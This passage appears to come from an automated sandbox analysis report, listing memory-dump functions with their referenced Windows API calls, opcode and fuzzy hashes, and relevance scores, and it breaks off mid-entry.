                                                                                                  Function 01390818, Relevance: 5.0, APIs: 2, Instructions: 2008COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e5eb79d72796179f862edfc1b0450785121be3b50a9432824ec8b1c7ee06826
                                                                                                  • Instruction ID: ec2b9be1a4e7f2778d076ef5b4ac4e3b3ea7736226ef00b25ee7a39bf7ea3673
                                                                                                  • Opcode Fuzzy Hash: 9e5eb79d72796179f862edfc1b0450785121be3b50a9432824ec8b1c7ee06826
                                                                                                  • Instruction Fuzzy Hash: A3E2F672B413018FDF198F78C8523ED7BB6EBA2218F1889BDD016DB351E6798942CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 01768858, Relevance: 2.3, APIs: 1, Instructions: 788COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9554c95c5ab08e5415f71b8a44986b15dcb5d6baf8c78561b4b64cb23e7cb4c5
                                                                                                  • Instruction ID: cfd82c6bf67bfe795fb4b6d3d1449e77d7ca35fbc1aa6d8a4d5e3a2bf10910d7
                                                                                                  • Opcode Fuzzy Hash: 9554c95c5ab08e5415f71b8a44986b15dcb5d6baf8c78561b4b64cb23e7cb4c5
                                                                                                  • Instruction Fuzzy Hash: 03722971E007198FCB25EF78C85469DB7F5AF99304F1089AAD90AAB354EF309D85CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 01399DF0, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1451eb6aa63fc5cd257eb5e9a6ee8029d8da35c07515e9478f7c92379e15d63f
                                                                                                  • Instruction ID: badaf3566712a88c712f75e235c45d7eba3b72dc88ae9f2045bb6515cc2df6c5
                                                                                                  • Opcode Fuzzy Hash: 1451eb6aa63fc5cd257eb5e9a6ee8029d8da35c07515e9478f7c92379e15d63f
                                                                                                  • Instruction Fuzzy Hash: D4614C30E10309DBDB24EFB9D5587AEBBF6AF84309F108928D406A77A4DF759845CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E6B1F, Relevance: 6.1, APIs: 4, Instructions: 143threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6BB0
                                                                                                  • GetCurrentThread.KERNEL32 ref: 017E6BED
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6C2A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 017E6C83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: d79e00a3888a4ec31043b051caa40282fd2a71e5406f5da9d77d4e44aa9cd301
                                                                                                  • Instruction ID: a3468c37e2b1d5ec0832e55d62595130147d98a4390d1baedc9c58e82d1f52dd
                                                                                                  • Opcode Fuzzy Hash: d79e00a3888a4ec31043b051caa40282fd2a71e5406f5da9d77d4e44aa9cd301
                                                                                                  • Instruction Fuzzy Hash: 7D5187B09047888FDB10CFA9C548BDEBFF0EF59314F2484AAE448A7261D7B46844CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E6B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6BB0
                                                                                                  • GetCurrentThread.KERNEL32 ref: 017E6BED
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6C2A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 017E6C83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 0b097dc068087f14a86b3be6b73659f9dd6875423cac56deb79415f6c93b1504
                                                                                                  • Instruction ID: edd637224cc94c6bd4c190a280aeb360ec300c258ffb2cc63d8b00beefc1a235
                                                                                                  • Opcode Fuzzy Hash: 0b097dc068087f14a86b3be6b73659f9dd6875423cac56deb79415f6c93b1504
                                                                                                  • Instruction Fuzzy Hash: 225133B09107488FDB54CFA9D548BDEFBF5EFA8314F208469E419A7360DB746884CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0139CB70, Relevance: 2.3, APIs: 1, Instructions: 787COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f56270de7a0f0b0c7dfde8a9b225f42dd07ca80b8bf0f291818d583ce4f85d41
                                                                                                  • Instruction ID: b5217a3047c36cf824df19aacd355aa01e0299864389b58a8a4146b0950a4ecd
                                                                                                  • Opcode Fuzzy Hash: f56270de7a0f0b0c7dfde8a9b225f42dd07ca80b8bf0f291818d583ce4f85d41
                                                                                                  • Instruction Fuzzy Hash: 4F52C630B093418FDB029BB8981D7697BF6AF86314F1584B6E545CB3A6EB78CC09C761
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E3E4B, Relevance: 1.8, APIs: 1, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 6ecd104761baaa029f38ac53dfceb173b11646526c667a7bdb2e4504d196ad8e
                                                                                                  • Instruction ID: 9a0ecd777d025cd87a34b010a590b360a4aa8e3537ad01d4448385f1c3113289
                                                                                                  • Opcode Fuzzy Hash: 6ecd104761baaa029f38ac53dfceb173b11646526c667a7bdb2e4504d196ad8e
                                                                                                  • Instruction Fuzzy Hash: 41B17770A007058FDB04EF79C48866EFBF6FF98214B10896ED80ADB765DB74E8058B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E510F, Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6cb24cc78fe49a0ec11a430293a68f5e00a009955dd56f0923276ec6a8535b68
                                                                                                  • Instruction ID: 1672489f124d6d95f0657b8275c523afc42f0fc02e34625e334347d39757c993
                                                                                                  • Opcode Fuzzy Hash: 6cb24cc78fe49a0ec11a430293a68f5e00a009955dd56f0923276ec6a8535b68
                                                                                                  • Instruction Fuzzy Hash: 656122B5C0424DAFDF12CFA9D888ACDBFF5AF49318F24815AE808AB221D7719845CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017673B8, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7997eb014bbefd9bb601ae423d09a352804f2abf33cf13dfa1572dfe9984ea8c
                                                                                                  • Instruction ID: b2dfbe29be4301c13304da8a296241e8aa2eecb5bab1d265299953aa2bc42ec7
                                                                                                  • Opcode Fuzzy Hash: 7997eb014bbefd9bb601ae423d09a352804f2abf33cf13dfa1572dfe9984ea8c
                                                                                                  • Instruction Fuzzy Hash: FB517571B002059FCB14EFB4D848AEEFBF6BF94248B148969D5069B355EF30D805CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017673A7, Relevance: 1.6, APIs: 1, Instructions: 145libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0b213e397662c06639aabc7c48d9f983fd70c1bf164ca58c5e095e9966446958
                                                                                                  • Instruction ID: a338fe9e8b3942fd128f512e133668b6ede43351b5871efd67746256e0b3eba8
                                                                                                  • Opcode Fuzzy Hash: 0b213e397662c06639aabc7c48d9f983fd70c1bf164ca58c5e095e9966446958
                                                                                                  • Instruction Fuzzy Hash: 9D51A671B003059FCB14EFB4D848AEDBBF5BF94208B14896AD4129B3A5EF30D805CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0139DD88, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c8a53edb07896a9be9b7d42af9da3011923a2f0219914c4bc4318829ee839e9
                                                                                                  • Instruction ID: 7d1773e630317fd036db5cdf3e8d7d8305cf686ee4670ddb30303f08a1b5a89e
                                                                                                  • Opcode Fuzzy Hash: 5c8a53edb07896a9be9b7d42af9da3011923a2f0219914c4bc4318829ee839e9
                                                                                                  • Instruction Fuzzy Hash: 24412172E047568FCB04CFB9C8042DEBBF5EF99214F1889AAC409A7251DB789885CBD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E5184, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017E52A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: c86df8f69ec8c3735cb0439415e83e046c3a007e785c739603479d4fa4b79a98
                                                                                                  • Instruction ID: 576ba06d8a11a8e88c74b801322a3963c50e74761d71845742e47ed487188e02
                                                                                                  • Opcode Fuzzy Hash: c86df8f69ec8c3735cb0439415e83e046c3a007e785c739603479d4fa4b79a98
                                                                                                  • Instruction Fuzzy Hash: 2151D0B1C103089FDB14CF99D884ADEFBF5BF58314F64812AE818AB210D7749845CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E5190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017E52A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: b277345ba780958366f7f388a2efeb1f89b08782aa5e3af79ef1a010e85fae8d
                                                                                                  • Instruction ID: 1f46b21dd9076d69869331938785f84d4b0341d7205c125b5f0701d558c300e9
                                                                                                  • Opcode Fuzzy Hash: b277345ba780958366f7f388a2efeb1f89b08782aa5e3af79ef1a010e85fae8d
                                                                                                  • Instruction Fuzzy Hash: DB41CEB1D103089FDB14CF9AC884ADEFBF5BF58314F64812AE818AB210D774A885CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0176C908, Relevance: 1.6, APIs: 1, Instructions: 107registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0176CA0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: 7e764db84bae9aad7dc0a9703837cb870062310874243d3c78017ae5f784c660
                                                                                                  • Instruction ID: 63dea82d04359056bb1a2adbb69c0fc29cec6fd5015fbbf8f821f8324f4cf043
                                                                                                  • Opcode Fuzzy Hash: 7e764db84bae9aad7dc0a9703837cb870062310874243d3c78017ae5f784c660
                                                                                                  • Instruction Fuzzy Hash: 774128B0E003498FDB15CF98C548B9EFBF9AF48304F24C56AD848AB345D7759945CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E6964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 017E7CF9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 82f92a82907c25d710c157873441084d52ba74178fe6af57c6d05c0dc9546b31
                                                                                                  • Instruction ID: f350131921f4b4022ea84a46514ee4b04921e89a2a227ca4af49dafe9e46a0cd
                                                                                                  • Opcode Fuzzy Hash: 82f92a82907c25d710c157873441084d52ba74178fe6af57c6d05c0dc9546b31
                                                                                                  • Instruction Fuzzy Hash: 45414AB59003458FCB14CF99C488AAAFBF9FF9C324F248458D419A7321D774A841CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0176CBB5, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0176CC79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: 3907d767ae4d707745a6714e49572d5d928139d1cd82e742baea986396dfba3f
                                                                                                  • Instruction ID: 2c60e58f441185a13547377cbdf740d815b5754ab98e23c145bfa6aa2c2df21c
                                                                                                  • Opcode Fuzzy Hash: 3907d767ae4d707745a6714e49572d5d928139d1cd82e742baea986396dfba3f
                                                                                                  • Instruction Fuzzy Hash: 7D31FDB1D006589FCB10CF9AD984ACEFBF9BF48314F54842AE859AB314D7749949CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0176BFA4, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0176CC79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: 15416d887718022036a2a71e4dad51d1186480bf54b295b28bf4348ddb9a5633
                                                                                                  • Instruction ID: fe57c80665a0114a4f0880049336485c68394fc04aee8378d70ae36488b70f82
                                                                                                  • Opcode Fuzzy Hash: 15416d887718022036a2a71e4dad51d1186480bf54b295b28bf4348ddb9a5633
                                                                                                  • Instruction Fuzzy Hash: 6631EDB1D002589FCB10CF9AD984ADEFBF9BF48314F54842AE859AB314D774A905CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0176BF98, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0176CA0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: fc1c75ad13171c305a9ec2b796095a2640244e21d35c1e7cd18932043f957a57
                                                                                                  • Instruction ID: 620b2c5de34b619bf1d755638700992bad4e91a1ef8ac9947d147d0735c964be
                                                                                                  • Opcode Fuzzy Hash: fc1c75ad13171c305a9ec2b796095a2640244e21d35c1e7cd18932043f957a57
                                                                                                  • Instruction Fuzzy Hash: D731F2B0D003499FDB14CF99C584A8EFBF9BF48304F68856AE909AB344C7B59949CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E6D71, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017E6DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 9ba5629515e68bbb08124f32bfc0ee4fdd4b30820b15537b91e51318764e707b
                                                                                                  • Instruction ID: a5e7a8236cab9b93ad8e6359e8f1acb931deafb61dfdf5936d9db240928c2607
                                                                                                  • Opcode Fuzzy Hash: 9ba5629515e68bbb08124f32bfc0ee4fdd4b30820b15537b91e51318764e707b
                                                                                                  • Instruction Fuzzy Hash: EB21E3B5900218AFDB10CFA9D488ADEFBF8FB58324F54842AE914A7350D374A954CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E6D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017E6DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: e8b10d8dad5ab060ef112577f7c2321f8871e2a7421c7dc9ed2c1583c6551da3
                                                                                                  • Instruction ID: 95a59041513ff13d8ced441979a14937beda1ad218ac5e8769240717452685d0
                                                                                                  • Opcode Fuzzy Hash: e8b10d8dad5ab060ef112577f7c2321f8871e2a7421c7dc9ed2c1583c6551da3
                                                                                                  • Instruction Fuzzy Hash: 6621F5B59002189FDB10CFA9D484ADEFBF8FB58324F14841AE914A7350D374A954CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E2F30, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: d4c4d9883df5e7942f5cb31f0c107bf28c77a703fe1d0f965fcf4cd30cd61bb6
                                                                                                  • Instruction ID: 6dfb9365d144fc6f7142e173f4414f818831e98616b9584b1bebc7d802c3de7d
                                                                                                  • Opcode Fuzzy Hash: d4c4d9883df5e7942f5cb31f0c107bf28c77a703fe1d0f965fcf4cd30cd61bb6
                                                                                                  • Instruction Fuzzy Hash: CB2136B1D046488FCB10CFAAD448ADEFBF8EF59224F14886AD456B7201C374A549CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017EC3B1, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 017EC432
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2118026453-0
                                                                                                  • Opcode ID: b20956016a3b60c63c9b9c2b390acb6b4b58159215c51271a07c64e26f7f3300
                                                                                                  • Instruction ID: 11ecc034d72153e855ebaf6253f28571ceeaeefca8df57c75a39a68fe03f8ee8
                                                                                                  • Opcode Fuzzy Hash: b20956016a3b60c63c9b9c2b390acb6b4b58159215c51271a07c64e26f7f3300
                                                                                                  • Instruction Fuzzy Hash: 4D218CB59013488FDB21DFA9D4097EEBFF8EB49318F64842AD848B7200C7796544CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 01399DE4, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 98cbfa4ea084b0ddb639dbec1efbe05db9ad364cb59c884570c44a40238bbf25
                                                                                                  • Instruction ID: e5dd08679ec6026d65528c068eb6e5d466b0446e9d1f63247eec16de2aa30872
                                                                                                  • Opcode Fuzzy Hash: 98cbfa4ea084b0ddb639dbec1efbe05db9ad364cb59c884570c44a40238bbf25
                                                                                                  • Instruction Fuzzy Hash: 4B210870E11319DFCB15DFA8D588BAEBBB2FB84309F118929D401A7354CB76A889CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017EC3B8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 017EC432
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2118026453-0
                                                                                                  • Opcode ID: e16c42e2241d07347ab9077ffeabf6c5cf824c2bfbdd5b48457fe414d00ce0b4
                                                                                                  • Instruction ID: eb46302c8a255c447d39a5f413ecfd153772dbf22694d33c7eb78c7d2873dec8
                                                                                                  • Opcode Fuzzy Hash: e16c42e2241d07347ab9077ffeabf6c5cf824c2bfbdd5b48457fe414d00ce0b4
                                                                                                  • Instruction Fuzzy Hash: EF119AB59013088FDB21DFA9D4097AEBFF8EB49318F64842AD408B7600C7796984CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0139DE5A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0139DEC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: 0753bb8a03e89d1e2d03240b758e9543f330b8ea8e8e34fc5d91ebaeb8f9de82
                                                                                                  • Instruction ID: 2e8f0af336b3955f38850daaea6f9497b5d3df122f5ae147bacceeb358179146
                                                                                                  • Opcode Fuzzy Hash: 0753bb8a03e89d1e2d03240b758e9543f330b8ea8e8e34fc5d91ebaeb8f9de82
                                                                                                  • Instruction Fuzzy Hash: EA1106B1C006599FCB00CF9AD444BDEBBB4EF48224F14856AD818B7240D378A949CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E2F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 51ab8b1d2a0d4a1e4e4281164c1f5dcb9e78885673c09053da9074a458a5b425
                                                                                                  • Instruction ID: 0a8e388fce697ae9ba3ded956c38713077e0467472dbf1b0e91331fb2d8f627c
                                                                                                  • Opcode Fuzzy Hash: 51ab8b1d2a0d4a1e4e4281164c1f5dcb9e78885673c09053da9074a458a5b425
                                                                                                  • Instruction Fuzzy Hash: C711F0B1D006498BDB10CF9AD448BDEFBF8EB99224F54846AD929B7200C374A545CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 017E41AB, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 3128734693cb7846983d2f7d8b4a932edabf7698ce93039ad0b35e479b4ce703
                                                                                                  • Instruction ID: a3d1d1475c83e69bb412257a3f1732f95bd63944de337f62717a0c95c7db475d
                                                                                                  • Opcode Fuzzy Hash: 3128734693cb7846983d2f7d8b4a932edabf7698ce93039ad0b35e479b4ce703
                                                                                                  • Instruction Fuzzy Hash: DE1102B1C006498FDB10CF9AD848BDEFBF8EF88224F14842AD829B7200C374A545CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0139D488, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetActiveProcessorCount.KERNEL32(00000000), ref: 0139D4CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: ActiveCountProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2731003492-0
                                                                                                  • Opcode ID: c4952809ddaafbfeeee37f1d0961d88577dc6daf5444b693e2f6b50b97658986
                                                                                                  • Instruction ID: 3a39df9b3e7391f7c65fa07106aaec3d278cdcfb68116b67c99d6287df917e9b
                                                                                                  • Opcode Fuzzy Hash: c4952809ddaafbfeeee37f1d0961d88577dc6daf5444b693e2f6b50b97658986
